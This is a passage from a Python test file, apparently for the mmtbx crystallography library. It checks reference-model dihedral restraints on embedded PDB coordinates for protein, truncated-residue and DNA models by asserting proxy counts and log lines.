ATOM    104  CG  ASN A  10      40.136   6.118  14.715  1.00 78.91           C
ATOM    105  OD1 ASN A  10      41.317   5.836  14.855  1.00 78.91           O
ATOM    106  ND2 ASN A  10      39.329   6.346  15.746  1.00 78.91           N
ATOM    109  C   ASN A  10      39.894   6.092  10.871  1.00 79.63           C
ATOM    110  O   ASN A  10      39.405   5.000  10.574  1.00 79.63           O
TER
END
"""
  pdb_str_ref = """\
CRYST1   49.945   53.842   33.425  90.00  90.00  90.00 P 1
ATOM   5466  N   ASN C 236      10.328  45.698  25.449  1.00 60.13           N
ATOM   5467  CA  ASN C 236       8.971  45.973  25.787  1.00 60.52           C
ATOM   5468  C   ASN C 236       8.271  44.664  25.724  1.00 60.49           C
ATOM   5469  O   ASN C 236       7.276  44.532  25.017  1.00 60.60           O
ATOM   5470  CB  ASN C 236       8.337  46.962  24.776  1.00 60.55           C
ATOM   5471  CG  ASN C 236       7.235  47.762  25.415  1.00 61.75           C
ATOM   5472  OD1 ASN C 236       6.331  47.222  26.063  1.00 62.86           O
ATOM   5473  ND2 ASN C 236       7.315  49.079  25.302  1.00 61.22           N
ATOM   5474  N   LEU C 237       8.820  43.663  26.441  1.00 60.55           N
ATOM   5475  CA  LEU C 237       8.420  42.305  26.286  1.00 60.48           C
ATOM   5476  C   LEU C 237       8.713  41.508  27.558  1.00 60.06           C
ATOM   5477  O   LEU C 237       7.907  41.421  28.503  1.00 60.41           O
ATOM   5478  CB  LEU C 237       9.159  41.598  25.114  1.00 60.91           C
ATOM   5479  CG  LEU C 237       9.365  42.136  23.662  1.00 62.25           C
ATOM   5480  CD1 LEU C 237      10.605  42.996  23.496  1.00 63.18           C
ATOM   5481  CD2 LEU C 237       9.419  40.966  22.765  1.00 62.89           C
TER
ATOM      1  N   THR A   3      40.527  19.363  20.612  1.00 80.52           N
ATOM      2  CA  THR A   3      41.278  18.625  19.636  1.00 80.52           C
ATOM      4  CB  THR A   3      40.971  17.090  19.710  1.00 79.62           C
ATOM      6  OG1 THR A   3      40.039  16.849  20.760  1.00 79.62           O
ATOM      8  CG2 THR A   3      42.308  16.246  19.999  1.00 79.62           C
ATOM     12  C   THR A   3      40.899  19.134  18.229  1.00 80.52           C
ATOM     13  O   THR A   3      39.780  19.542  17.983  1.00 80.52           O
ATOM     17  N   GLY A   4      41.890  19.246  17.384  1.00 79.31           N
ATOM     18  CA  GLY A   4      41.732  19.850  16.092  1.00 79.31           C
ATOM     21  C   GLY A   4      41.306  18.930  14.985  1.00 79.31           C
ATOM     22  O   GLY A   4      40.121  18.885  14.657  1.00 79.31           O
ATOM     24  N   ALA A   5      42.279  18.233  14.402  1.00 78.81           N
ATOM     25  CA  ALA A   5      41.969  17.264  13.392  1.00 78.81           C
ATOM     27  CB  ALA A   5      42.474  17.741  12.001  1.00 77.40           C
ATOM     31  C   ALA A   5      42.643  15.914  13.751  1.00 78.81           C
ATOM     32  O   ALA A   5      43.503  15.474  12.983  1.00 78.81           O
ATOM     34  N   GLN A   6      42.216  15.310  14.835  1.00 80.55           N
ATOM     35  CA  GLN A   6      42.871  14.115  15.363  1.00 80.55           C
ATOM     37  CB  GLN A   6      43.590  14.383  16.698  1.00 79.84           C
ATOM     40  CG  GLN A   6      44.888  15.121  16.536  1.00 79.84           C
ATOM     43  CD  GLN A   6      44.671  16.613  16.295  1.00 79.84           C
ATOM     44  OE1 GLN A   6      44.164  17.330  17.155  1.00 79.84           O
ATOM     45  NE2 GLN A   6      45.100  17.105  15.149  1.00 79.84           N
ATOM     48  C   GLN A   6      41.888  12.972  15.564  1.00 80.55           C
ATOM     49  O   GLN A   6      42.024  12.228  16.514  1.00 80.55           O
ATOM     51  N   VAL A   7      40.933  12.858  14.656  1.00 79.06           N
ATOM     52  CA  VAL A   7      40.101  11.677  14.619  1.00 79.06           C
ATOM     54  CB  VAL A   7      38.947  11.709  15.573  1.00 78.99           C
ATOM     56  CG1 VAL A   7      39.330  11.128  16.941  1.00 78.99           C
ATOM     60  CG2 VAL A   7      38.334  13.128  15.699  1.00 78.99           C
ATOM     64  C   VAL A   7      39.594  11.421  13.214  1.00 79.06           C
ATOM     65  O   VAL A   7      38.407  11.279  12.954  1.00 79.06           O
ATOM     67  N   TYR A   8      40.568  11.433  12.304  1.00 79.78           N
ATOM     68  CA  TYR A   8      40.360  10.983  10.905  1.00 79.78           C
ATOM     70  CB  TYR A   8      40.783  12.069   9.904  1.00 77.69           C
ATOM     73  CG  TYR A   8      40.349  11.670   8.527  1.00 77.69           C
ATOM     74  CD1 TYR A   8      39.008  11.604   8.192  1.00 77.69           C
ATOM     76  CE1 TYR A   8      38.600  11.184   6.931  1.00 77.69           C
ATOM     78  CZ  TYR A   8      39.528  10.864   5.979  1.00 77.69           C
ATOM     79  OH  TYR A   8      39.195  10.466   4.696  1.00 77.69           O
ATOM     81  CE2 TYR A   8      40.880  10.918   6.304  1.00 77.69           C
ATOM     83  CD2 TYR A   8      41.286  11.303   7.563  1.00 77.69           C
ATOM     85  C   TYR A   8      41.107   9.702  10.624  1.00 79.78           C
ATOM     86  O   TYR A   8      40.892   9.064   9.584  1.00 79.78           O
ATOM     88  N   ALA A   9      42.003   9.312  11.526  1.00 79.03           N
ATOM     89  CA  ALA A   9      42.888   8.166  11.317  1.00 79.02           C
ATOM     91  CB  ALA A   9      44.052   8.246  12.231  1.00 79.18           C
ATOM     95  C   ALA A   9      42.102   6.856  11.504  1.00 79.02           C
ATOM     96  O   ALA A   9      42.154   5.981  10.647  1.00 79.02           O
ATOM     98  N   ASN A  10      41.404   6.751  12.642  1.00 79.63           N
ATOM     99  CA  ASN A  10      40.465   5.684  12.913  1.00 79.63           C
ATOM    101  CB  ASN A  10      39.947   5.766  14.373  1.00 78.91           C
ATOM    104  CG  ASN A  10      41.037   5.501  15.391  1.00 78.91           C
ATOM    105  OD1 ASN A  10      42.073   4.895  15.058  1.00 78.91           O
ATOM    106  ND2 ASN A  10      40.820   5.957  16.635  1.00 78.91           N
ATOM    109  C   ASN A  10      39.283   5.748  11.958  1.00 79.63           C
ATOM    110  O   ASN A  10      39.365   5.382  10.797  1.00 79.63           O
TER
"""
  # Context manager guarantees the handle is closed even if write() fails.
  with open("ref.pdb", 'w') as ref_file:
    ref_file.write(pdb_str_ref)
  log = cStringIO.StringIO()
  # log = sys.stdout
  def_pars = reference_model_params
  all_pars = def_pars.fetch().extract()
  all_pars.reference_model.file = 'ref.pdb'
  all_pars.reference_model.enabled = True
  model = mmtbx.model.manager(
      model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
        source_info=None),
      process_input=True)
  pdb_h = model.get_hierarchy()
  rm = reference_model(
      model=model,
      reference_file_list=['ref.pdb'],
      params=all_pars.reference_model,
      log=log)
  # Both the chain C fragment and chain A must be matched automatically.
  assert rm.get_n_proxies() == 36, \
      "Expecting 36 proxies, got %d" % rm.get_n_proxies()
  os.remove("ref.pdb")
def exercise_cutted_residue(mon_lib_srv, ener_lib):
  """Exercise reference-model restraints for incomplete ("cut") residues.

  The model chain K is missing several side-chain atoms (e.g. THR without
  OG1/CG2, VAL without CG1/CG2) while the reference chain G is complete.
  After set_rotamer_to_reference is applied, the truncated residues must
  still yield no rotamer outliers.

  NOTE(review): ``mon_lib_srv`` and ``ener_lib`` are unused in the body, and
  the temporary "ref.pdb" is intentionally left behind (unlike the other
  exercises) -- confirm whether cleanup is desired.
  """
  pdb_str_original = """\
CRYST1  117.739  195.224  119.094  90.00 101.60  90.00 P 1 21 1
ATOM   6368  N   THR K 332       4.163  72.088  52.141  1.00171.28           N
ATOM   6369  CA  THR K 332       2.830  71.741  52.608  1.00153.71           C
ATOM   6370  C   THR K 332       1.990  70.958  51.609  1.00132.45           C
ATOM   6371  O   THR K 332       2.224  71.000  50.405  1.00130.38           O
ATOM   6372  CB  THR K 332       2.047  72.996  53.035  1.00155.45           C
ATOM   6373  N   VAL K 333       1.006  70.246  52.144  1.00121.58           N
ATOM   6374  CA  VAL K 333       0.085  69.440  51.360  1.00129.11           C
ATOM   6375  C   VAL K 333      -1.326  69.771  51.818  1.00146.57           C
ATOM   6376  O   VAL K 333      -1.517  70.242  52.935  1.00151.92           O
ATOM   6377  CB  VAL K 333       0.342  67.942  51.562  1.00126.37           C
ATOM   6378  N   SER K 334      -2.318  69.535  50.968  1.00156.08           N
ATOM   6379  CA  SER K 334      -3.687  69.866  51.335  1.00158.16           C
ATOM   6380  C   SER K 334      -4.197  69.116  52.555  1.00157.55           C
ATOM   6381  O   SER K 334      -4.066  67.905  52.664  1.00161.93           O
ATOM   6382  CB  SER K 334      -4.630  69.614  50.166  1.00162.09           C
ATOM   6383  OG  SER K 334      -5.836  69.041  50.632  1.00170.98           O
END
"""
  pdb_str_ref = """\
CRYST1  117.739  195.224  119.094  90.00 101.60  90.00 P 1 21 1
ATOM      1  N   THR G 332       4.195  72.012  51.895  1.00171.28           N
ATOM      2  CA  THR G 332       2.946  71.699  52.580  1.00153.71           C
ATOM      3  C   THR G 332       1.980  70.971  51.651  1.00132.45           C
ATOM      4  O   THR G 332       2.092  71.062  50.429  1.00130.38           O
ATOM      5  CB  THR G 332       2.291  72.982  53.125  1.00 20.00           C
ATOM      6  OG1 THR G 332       2.036  73.887  52.046  1.00 20.00           O
ATOM      7  CG2 THR G 332       3.269  73.749  54.003  1.00 20.00           C
ATOM      8  N   VAL G 333       1.033  70.248  52.240  1.00121.58           N
ATOM      9  CA  VAL G 333       0.047  69.503  51.468  1.00129.11           C
ATOM     10  C   VAL G 333      -1.363  69.905  51.883  1.00146.57           C
ATOM     11  O   VAL G 333      -1.552  70.599  52.882  1.00151.92           O
ATOM     12  CB  VAL G 333       0.216  67.983  51.643  1.00 20.00           C
ATOM     13  CG1 VAL G 333      -0.905  67.237  50.935  1.00 20.00           C
ATOM     14  CG2 VAL G 333       1.574  67.534  51.125  1.00 20.00           C
ATOM     15  N   SER G 334      -2.351  69.465  51.111  1.00156.08           N
ATOM     16  CA  SER G 334      -3.745  69.778  51.397  1.00158.16           C
ATOM     17  C   SER G 334      -4.297  68.870  52.492  1.00157.55           C
ATOM     18  O   SER G 334      -3.964  67.686  52.556  1.00161.93           O
ATOM     19  CB  SER G 334      -4.595  69.652  50.131  1.00162.09           C
ATOM     20  OG  SER G 334      -5.954  69.950  50.396  1.00170.98           O
"""
  # Model chain K is restrained to the complete reference chain G.
  params_text = """\
reference_model {
  reference_group {
    reference = chain 'G'
    selection = chain 'K'
    file_name = "ref.pdb"
  }
}
"""
  # Context manager guarantees the handle is closed even if write() fails.
  with open("ref.pdb", 'w') as ref_file:
    ref_file.write(pdb_str_ref)
  log = cStringIO.StringIO()
  # log = sys.stdout
  # orig_file = open("start.pdb", "w")
  # orig_file.write(pdb_str_original)
  # orig_file.close()
  def_pars = reference_model_params
  pars = iotbx.phil.parse(params_text)
  all_pars = def_pars.fetch(pars).extract()
  all_pars.reference_model.enabled = True
  model = mmtbx.model.manager(
      model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
        source_info=None),
      process_input=True)
  pdb_h = model.get_hierarchy()
  rm = reference_model(
      model=model,
      reference_file_list=['ref.pdb'],
      params=all_pars.reference_model,
      log=log)
  rm.show_reference_summary(log=log)
  # Apply reference rotamers; truncated residues must not become outliers.
  new_h = pdb_h.deep_copy()
  xray_structure = new_h.extract_xray_structure()
  rm.set_rotamer_to_reference(
      xray_structure=xray_structure)
  new_h.adopt_xray_structure(xray_structure)
  r1 = rotalyze(pdb_hierarchy=new_h, outliers_only=False)
  assert r1.n_outliers == 0
def exercise_dna(mon_lib_srv, ener_lib):
  """Exercise reference-model restraints on a small DNA model.

  The working model (two DA/DT stretches in chains A and B) is also written
  out as the reference file "ref.pdb".  The reference-model machinery is run
  twice: once with explicit per-chain reference_group selections and once
  with only a file-level reference, and both passes must yield 74 proxies
  and log the expected residue-to-residue pairings.
  """
  # Two short DNA fragments, chains A (DA 5-6, DT 7-8) and B (DA 17-18,
  # DT 19-20).  Content must stay byte-identical: it is parsed by iotbx.pdb.
  pdb_str_original = """\
CRYST1 25.287 40.217 65.471 90.00 90.00 90.00 P 21 21 21 8
SCALE1 0.039546 0.000000 0.000000 0.00000
SCALE2 0.000000 0.024865 0.000000 0.00000
SCALE3 0.000000 0.000000 0.015274 0.00000
ATOM 80 P DA A 5 -8.062 -5.965 -15.755 1.00 42.17 P
ATOM 81 OP1 DA A 5 -8.426 -7.228 -16.405 1.00 50.61 O
ATOM 82 OP2 DA A 5 -8.689 -5.557 -14.457 1.00 51.75 O
ATOM 83 O5' DA A 5 -6.496 -5.961 -15.638 1.00 34.89 O
ATOM 84 C5' DA A 5 -5.791 -6.321 -16.790 1.00 30.71 C
ATOM 85 C4' DA A 5 -4.355 -5.917 -16.600 1.00 34.43 C
ATOM 86 O4' DA A 5 -4.303 -4.509 -16.239 1.00 33.96 O
ATOM 87 C3' DA A 5 -3.630 -6.687 -15.491 1.00 35.56 C
ATOM 88 O3' DA A 5 -2.407 -7.257 -16.020 1.00 33.08 O
ATOM 89 C2' DA A 5 -3.531 -5.654 -14.384 1.00 32.41 C
ATOM 90 C1' DA A 5 -3.435 -4.334 -15.130 1.00 28.44 C
ATOM 91 N9 DA A 5 -3.904 -3.143 -14.449 1.00 28.37 N
ATOM 92 C8 DA A 5 -5.187 -2.933 -14.022 1.00 27.53 C
ATOM 93 N7 DA A 5 -5.401 -1.724 -13.565 1.00 29.33 N
ATOM 94 C5 DA A 5 -4.187 -1.082 -13.747 1.00 23.78 C
ATOM 95 C6 DA A 5 -3.761 0.226 -13.474 1.00 25.22 C
ATOM 96 N6 DA A 5 -4.519 1.150 -12.896 1.00 25.69 N
ATOM 97 N1 DA A 5 -2.485 0.535 -13.749 1.00 24.39 N
ATOM 98 C2 DA A 5 -1.712 -0.389 -14.320 1.00 24.89 C
ATOM 99 N3 DA A 5 -2.001 -1.641 -14.653 1.00 28.33 N
ATOM 100 C4 DA A 5 -3.268 -1.935 -14.326 1.00 27.45 C
ATOM 101 P DA A 6 -1.382 -8.057 -15.083 1.00 33.49 P
ATOM 102 OP1 DA A 6 -0.596 -8.971 -15.989 1.00 35.26 O
ATOM 103 OP2 DA A 6 -2.097 -8.481 -13.890 1.00 34.48 O
ATOM 104 O5' DA A 6 -0.480 -6.949 -14.401 1.00 31.72 O
ATOM 105 C5' DA A 6 0.398 -6.138 -15.188 1.00 28.12 C
ATOM 106 C4' DA A 6 1.219 -5.272 -14.269 1.00 22.57 C
ATOM 107 O4' DA A 6 0.380 -4.203 -13.784 1.00 23.34 O
ATOM 108 C3' DA A 6 1.783 -5.982 -13.049 1.00 23.61 C
ATOM 109 O3' DA A 6 3.202 -5.785 -13.150 1.00 22.60 O
ATOM 110 C2' DA A 6 1.110 -5.289 -11.881 1.00 22.21 C
ATOM 111 C1' DA A 6 0.653 -3.958 -12.418 1.00 20.89 C
ATOM 112 N9 DA A 6 -0.561 -3.398 -11.831 1.00 21.71 N
ATOM 113 C8 DA A 6 -1.777 -4.017 -11.666 1.00 23.62 C
ATOM 114 N7 DA A 6 -2.693 -3.249 -11.139 1.00 23.57 N
ATOM 115 C5 DA A 6 -2.071 -2.016 -11.029 1.00 20.29 C
ATOM 116 C6 DA A 6 -2.506 -0.774 -10.519 1.00 20.33 C
ATOM 117 N6 DA A 6 -3.763 -0.525 -10.122 1.00 20.36 N
ATOM 118 N1 DA A 6 -1.604 0.233 -10.486 1.00 20.84 N
ATOM 119 C2 DA A 6 -0.341 -0.023 -10.868 1.00 21.15 C
ATOM 120 N3 DA A 6 0.174 -1.126 -11.378 1.00 22.91 N
ATOM 121 C4 DA A 6 -0.746 -2.101 -11.433 1.00 20.00 C
ATOM 122 P DT A 7 4.283 -6.215 -12.051 1.00 23.53 P
ATOM 123 OP1 DT A 7 5.598 -6.398 -12.780 1.00 27.73 O
ATOM 124 OP2 DT A 7 3.774 -7.297 -11.205 1.00 24.18 O
ATOM 125 O5' DT A 7 4.350 -4.948 -11.106 1.00 22.94 O
ATOM 126 C5' DT A 7 4.668 -3.709 -11.633 1.00 21.30 C
ATOM 127 C4' DT A 7 4.525 -2.656 -10.580 1.00 20.84 C
ATOM 128 O4' DT A 7 3.138 -2.512 -10.296 1.00 19.94 O
ATOM 129 C3' DT A 7 5.205 -2.966 -9.250 1.00 20.02 C
ATOM 130 O3' DT A 7 6.280 -2.035 -9.099 1.00 23.74 O
ATOM 131 C2' DT A 7 4.144 -2.717 -8.200 1.00 19.47 C
ATOM 132 C1' DT A 7 3.048 -2.015 -8.962 1.00 20.12 C
ATOM 133 N1 DT A 7 1.641 -2.197 -8.524 1.00 20.27 N
ATOM 134 C2 DT A 7 0.957 -1.108 -8.030 1.00 18.61 C
ATOM 135 O2 DT A 7 1.430 0.017 -7.926 1.00 19.56 O
ATOM 136 N3 DT A 7 -0.344 -1.365 -7.721 1.00 18.89 N
ATOM 137 C4 DT A 7 -1.018 -2.563 -7.836 1.00 21.94 C
ATOM 138 O4 DT A 7 -2.200 -2.640 -7.497 1.00 23.57 O
ATOM 139 C5 DT A 7 -0.226 -3.674 -8.271 1.00 18.09 C
ATOM 140 C7 DT A 7 -0.860 -5.022 -8.351 1.00 19.35 C
ATOM 141 C6 DT A 7 1.065 -3.446 -8.562 1.00 17.66 C
ATOM 142 P DT A 8 7.284 -1.980 -7.857 1.00 26.43 P
ATOM 143 OP1 DT A 8 8.611 -1.444 -8.278 1.00 28.45 O
ATOM 144 OP2 DT A 8 7.248 -3.298 -7.198 1.00 27.17 O
ATOM 145 O5' DT A 8 6.613 -0.927 -6.882 1.00 25.09 O
ATOM 146 C5' DT A 8 6.357 0.403 -7.340 1.00 24.67 C
ATOM 147 C4' DT A 8 5.543 1.125 -6.301 1.00 23.10 C
ATOM 148 O4' DT A 8 4.228 0.541 -6.229 1.00 23.60 O
ATOM 149 C3' DT A 8 6.127 1.057 -4.884 1.00 25.21 C
ATOM 150 O3' DT A 8 6.507 2.380 -4.493 1.00 28.93 O
ATOM 151 C2' DT A 8 5.018 0.434 -4.050 1.00 23.32 C
ATOM 152 C1' DT A 8 3.795 0.667 -4.883 1.00 22.06 C
ATOM 153 N1 DT A 8 2.713 -0.291 -4.689 1.00 19.79 N
ATOM 154 C2 DT A 8 1.466 0.223 -4.414 1.00 18.40 C
ATOM 155 O2 DT A 8 1.263 1.399 -4.157 1.00 20.56 O
ATOM 156 N3 DT A 8 0.484 -0.716 -4.337 1.00 19.20 N
ATOM 157 C4 DT A 8 0.588 -2.075 -4.597 1.00 18.45 C
ATOM 158 O4 DT A 8 -0.397 -2.789 -4.538 1.00 21.38 O
ATOM 159 C5 DT A 8 1.920 -2.549 -4.859 1.00 17.02 C
ATOM 160 C7 DT A 8 2.126 -4.006 -5.116 1.00 20.50 C
ATOM 161 C6 DT A 8 2.895 -1.634 -4.959 1.00 19.29 C
TER 245 DG A 12
ATOM 325 P DA B 17 -10.220 1.260 -1.207 1.00 27.94 P
ATOM 326 OP1 DA B 17 -11.370 2.143 -0.856 1.00 34.83 O
ATOM 327 OP2 DA B 17 -10.221 0.599 -2.553 1.00 31.17 O
ATOM 328 O5' DA B 17 -8.842 2.020 -1.098 1.00 26.12 O
ATOM 329 C5' DA B 17 -8.558 2.683 0.094 1.00 25.41 C
ATOM 330 C4' DA B 17 -7.407 3.619 -0.107 1.00 26.38 C
ATOM 331 O4' DA B 17 -6.208 2.886 -0.440 1.00 24.41 O
ATOM 332 C3' DA B 17 -7.600 4.631 -1.214 1.00 27.57 C
ATOM 333 O3' DA B 17 -6.972 5.834 -0.764 1.00 29.89 O
ATOM 334 C2' DA B 17 -6.902 3.980 -2.406 1.00 26.29 C
ATOM 335 C1' DA B 17 -5.771 3.225 -1.781 1.00 23.13 C
ATOM 336 N9 DA B 17 -5.444 1.986 -2.460 1.00 22.66 N
ATOM 337 C8 DA B 17 -6.295 0.942 -2.750 1.00 23.38 C
ATOM 338 N7 DA B 17 -5.700 -0.094 -3.288 1.00 20.62 N
ATOM 339 C5 DA B 17 -4.344 0.242 -3.234 1.00 20.59 C
ATOM 340 C6 DA B 17 -3.178 -0.447 -3.603 1.00 17.89 C
ATOM 341 N6 DA B 17 -3.184 -1.685 -4.072 1.00 20.22 N
ATOM 342 N1 DA B 17 -1.995 0.205 -3.497 1.00 19.61 N
ATOM 343 C2 DA B 17 -1.992 1.465 -3.030 1.00 20.38 C
ATOM 344 N3 DA B 17 -3.021 2.207 -2.621 1.00 20.80 N
ATOM 345 C4 DA B 17 -4.182 1.540 -2.774 1.00 19.17 C
ATOM 346 P DA B 18 -6.994 7.132 -1.670 1.00 32.91 P
ATOM 347 OP1 DA B 18 -6.817 8.281 -0.798 1.00 37.55 O
ATOM 348 OP2 DA B 18 -8.060 7.037 -2.636 1.00 31.04 O
ATOM 349 O5' DA B 18 -5.659 7.052 -2.535 1.00 30.20 O
ATOM 350 C5' DA B 18 -4.377 7.074 -1.958 1.00 30.19 C
ATOM 351 C4' DA B 18 -3.354 6.838 -3.036 1.00 28.09 C
ATOM 352 O4' DA B 18 -3.424 5.481 -3.484 1.00 26.27 O
ATOM 353 C3' DA B 18 -3.545 7.708 -4.286 1.00 29.73 C
ATOM 354 O3' DA B 18 -2.469 8.627 -4.273 1.00 34.73 O
ATOM 355 C2' DA B 18 -3.566 6.715 -5.433 1.00 27.32 C
ATOM 356 C1' DA B 18 -3.010 5.448 -4.841 1.00 24.83 C
ATOM 357 N9 DA B 18 -3.488 4.196 -5.410 1.00 23.72 N
ATOM 358 C8 DA B 18 -4.794 3.799 -5.530 1.00 20.51 C
ATOM 359 N7 DA B 18 -4.937 2.581 -5.985 1.00 22.85 N
ATOM 360 C5 DA B 18 -3.636 2.147 -6.189 1.00 20.87 C
ATOM 361 C6 DA B 18 -3.111 0.950 -6.675 1.00 19.34 C
ATOM 362 N6 DA B 18 -3.852 -0.099 -7.028 1.00 21.88 N
ATOM 363 N1 DA B 18 -1.767 0.849 -6.776 1.00 19.77 N
ATOM 364 C2 DA B 18 -1.023 1.872 -6.374 1.00 21.42 C
ATOM 365 N3 DA B 18 -1.392 3.050 -5.910 1.00 22.19 N
ATOM 366 C4 DA B 18 -2.734 3.129 -5.836 1.00 21.41 C
ATOM 367 P DT B 19 -2.064 9.546 -5.497 1.00 40.82 P
ATOM 368 OP1 DT B 19 -1.281 10.615 -4.939 1.00 44.52 O
ATOM 369 OP2 DT B 19 -3.292 9.787 -6.271 1.00 44.69 O
ATOM 370 O5' DT B 19 -1.119 8.619 -6.355 1.00 30.72 O
ATOM 371 C5' DT B 19 0.059 8.093 -5.804 1.00 29.16 C
ATOM 372 C4' DT B 19 0.704 7.195 -6.832 1.00 26.15 C
ATOM 373 O4' DT B 19 -0.129 6.045 -7.087 1.00 26.00 O
ATOM 374 C3' DT B 19 0.941 7.859 -8.188 1.00 25.98 C
ATOM 375 O3' DT B 19 2.343 7.877 -8.376 1.00 30.07 O
ATOM 376 C2' DT B 19 0.207 6.968 -9.181 1.00 26.77 C
ATOM 377 C1' DT B 19 0.036 5.665 -8.443 1.00 25.87 C
ATOM 378 N1 DT B 19 -1.122 4.839 -8.816 1.00 24.60 N
ATOM 379 C2 DT B 19 -0.906 3.556 -9.283 1.00 22.21 C
ATOM 380 O2 DT B 19 0.197 3.084 -9.451 1.00 22.06 O
ATOM 381 N3 DT B 19 -2.038 2.833 -9.519 1.00 22.04 N
ATOM 382 C4 DT B 19 -3.339 3.262 -9.380 1.00 21.81 C
ATOM 383 O4 DT B 19 -4.247 2.495 -9.615 1.00 24.16 O
ATOM 384 C5 DT B 19 -3.499 4.613 -8.891 1.00 22.25 C
ATOM 385 C7 DT B 19 -4.879 5.143 -8.663 1.00 23.26 C
ATOM 386 C6 DT B 19 -2.396 5.327 -8.640 1.00 22.85 C
ATOM 387 P DT B 20 3.005 8.456 -9.725 1.00 32.03 P
ATOM 388 OP1 DT B 20 4.339 8.958 -9.284 1.00 35.31 O
ATOM 389 OP2 DT B 20 2.027 9.351 -10.442 1.00 33.99 O
ATOM 390 O5' DT B 20 3.144 7.102 -10.543 1.00 31.33 O
ATOM 391 C5' DT B 20 3.894 5.979 -10.032 1.00 28.60 C
ATOM 392 C4' DT B 20 3.851 4.840 -11.020 1.00 28.63 C
ATOM 393 O4' DT B 20 2.494 4.361 -11.145 1.00 26.47 O
ATOM 394 C3' DT B 20 4.300 5.211 -12.437 1.00 31.59 C
ATOM 395 O3' DT B 20 5.260 4.256 -12.875 1.00 39.07 O
ATOM 396 C2' DT B 20 3.027 5.147 -13.257 1.00 26.06 C
ATOM 397 C1' DT B 20 2.211 4.120 -12.529 1.00 24.42 C
ATOM 398 N1 DT B 20 0.757 4.123 -12.660 1.00 23.79 N
ATOM 399 C2 DT B 20 0.138 2.932 -12.972 1.00 25.04 C
ATOM 400 O2 DT B 20 0.741 1.921 -13.262 1.00 24.66 O
ATOM 401 N3 DT B 20 -1.229 2.977 -12.959 1.00 25.84 N
ATOM 402 C4 DT B 20 -2.022 4.071 -12.671 1.00 25.98 C
ATOM 403 O4 DT B 20 -3.234 3.948 -12.646 1.00 28.14 O
ATOM 404 C5 DT B 20 -1.311 5.298 -12.387 1.00 22.81 C
ATOM 405 C7 DT B 20 -2.094 6.540 -12.092 1.00 27.47 C
ATOM 406 C6 DT B 20 0.028 5.263 -12.401 1.00 26.29 C
TER 490 DG B 24
"""
  # PHIL parameter string: explicit per-chain reference groups, both
  # pointing at the reference file written below.
  params_text = """\
reference_model {
reference_group {
reference = chain 'A'
selection = chain 'A'
file_name = "ref.pdb"
}
reference_group {
reference = chain 'B'
selection = chain 'B'
file_name = "ref.pdb"
}
}
"""
  # The reference is simply the model itself, written to disk.
  ref_file = open("ref.pdb", 'w')
  ref_file.write(pdb_str_original)
  ref_file.close()
  log = cStringIO.StringIO()
  # log = sys.stdout
  model = mmtbx.model.manager(
      model_input = iotbx.pdb.input(lines=flex.split_lines(pdb_str_original),
                                    source_info=None),
      process_input=True)
  pdb_h = model.get_hierarchy()
  # First pass: explicit reference_group selections; second pass: only a
  # file-level reference.  Both must give the same proxies and log output.
  for include_chains in [True, False]:
    def_pars = reference_model_params
    pars = iotbx.phil.parse(params_text)
    all_pars = None
    if include_chains:
      all_pars = def_pars.fetch(pars).extract()
      all_pars.reference_model.enabled = True
    else:
      all_pars = def_pars.extract()
      all_pars.reference_model.enabled = True
      all_pars.reference_model.file = "ref.pdb"
    rm = reference_model(
        model=model,
        reference_file_list=['ref.pdb'],
        params=all_pars.reference_model,
        log=log)
    rm.show_reference_summary(log=log)
    # Expected number of reference dihedral proxies for this DNA model.
    assert rm.get_n_proxies() == 74, \
        "Expecting 74 proxies, got %d" % rm.get_n_proxies()
    log_strings = log.getvalue().split("\n")
    # Each DNA residue must be paired with itself in the summary output.
    for needed_string in [
        " DA A 5 <=====> DA A 5",
        " DA A 6 <=====> DA A 6",
        " DT A 7 <=====> DT A 7",
        " DT A 8 <=====> DT A 8",
        " DA B 17 <=====> DA B 17",
        " DA B 18 <=====> DA B 18",
        " DT B 19 <=====> DT B 19",
        " DT B 20 <=====> DT B 20",
        ]:
      assert needed_string in log_strings, "'%s' not in log!" % needed_string
def exercise_3chains_self(mon_lib_srv, ener_lib):
  """
  Test reference model with 3 chains where the reference is the model
  itself (use_starting_model_as_reference), so selections are supposed to
  be mixed, like ref=(A or Bref or C) sel=(Aref, B, Cref).
  """
  # Three short protein chains A, B, C.  Content must stay byte-identical:
  # it is parsed by iotbx.pdb.
  pdb_str_original = """\
CRYST1 129.069 83.165 84.393 90.00 90.00 90.00 P 1
ATOM 1 N GLN A 1 118.638 78.165 29.859 1.00 32.70 A N
ATOM 2 CA GLN A 1 118.742 77.022 30.759 1.00 34.10 A C
ATOM 3 CB GLN A 1 117.844 77.222 31.984 1.00 34.85 A C
ATOM 4 CG GLN A 1 118.008 76.159 33.064 1.00 36.31 A C
ATOM 5 CD GLN A 1 117.167 76.441 34.295 1.00 37.02 A C
ATOM 6 OE1 GLN A 1 116.477 77.458 34.372 1.00 36.35 A O
ATOM 7 NE2 GLN A 1 117.221 75.538 35.268 1.00 38.45 A N
ATOM 8 C GLN A 1 118.377 75.725 30.039 1.00 35.48 A C
ATOM 9 O GLN A 1 119.251 75.008 29.552 1.00 35.59 A O
ATOM 10 N VAL A 2 117.083 75.432 29.969 1.00 36.49 A N
ATOM 11 CA VAL A 2 116.607 74.213 29.327 1.00 37.63 A C
ATOM 12 CB VAL A 2 115.168 73.893 29.751 1.00 38.86 A C
ATOM 13 CG1 VAL A 2 114.654 72.672 29.006 1.00 39.72 A C
ATOM 14 CG2 VAL A 2 115.096 73.682 31.255 1.00 39.93 A C
ATOM 15 C VAL A 2 116.698 74.327 27.811 1.00 36.86 A C
ATOM 16 O VAL A 2 116.042 75.175 27.207 1.00 36.25 A O
ATOM 17 N GLN A 3 117.506 73.466 27.200 1.00 37.05 A N
ATOM 18 CA GLN A 3 117.678 73.479 25.752 1.00 36.50 A C
ATOM 19 CB GLN A 3 118.915 74.294 25.365 1.00 35.23 A C
ATOM 20 CG GLN A 3 118.741 75.798 25.481 1.00 33.97 A C
ATOM 21 CD GLN A 3 119.955 76.561 24.994 1.00 32.60 A C
ATOM 22 OE1 GLN A 3 120.999 75.974 24.707 1.00 32.65 A O
ATOM 23 NE2 GLN A 3 119.823 77.879 24.893 1.00 31.40 A N
ATOM 24 C GLN A 3 117.794 72.072 25.176 1.00 37.49 A C
ATOM 25 O GLN A 3 118.315 71.161 25.827 1.00 38.37 A O
ATOM 26 N LEU A 4 117.302 71.907 23.951 1.00 37.44 A N
ATOM 27 CA LEU A 4 117.424 70.652 23.217 1.00 38.27 A C
ATOM 28 CB LEU A 4 116.107 69.872 23.227 1.00 39.05 A C
